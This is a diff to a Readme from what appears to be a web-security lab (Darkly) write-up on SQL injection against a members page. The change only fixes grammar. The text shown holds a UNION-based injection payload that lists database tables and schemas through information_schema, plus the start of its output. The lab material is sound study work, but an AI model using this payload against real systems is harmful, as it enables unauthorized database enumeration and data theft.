Melvin42/Darkly/SQL_Injection_Members/Resources/Readme.md

 ```
 1 UNION SELECT table_name, table_schema FROM  information_schema.tables
 ```
-It's work!
+It works!

-We got all the tables names and their schemas names:
+We got all the table names and their schema names:
 ```
 ID: 1 UNION SELECT table_name, table_schema FROM  information_schema.tables
 First name: db_default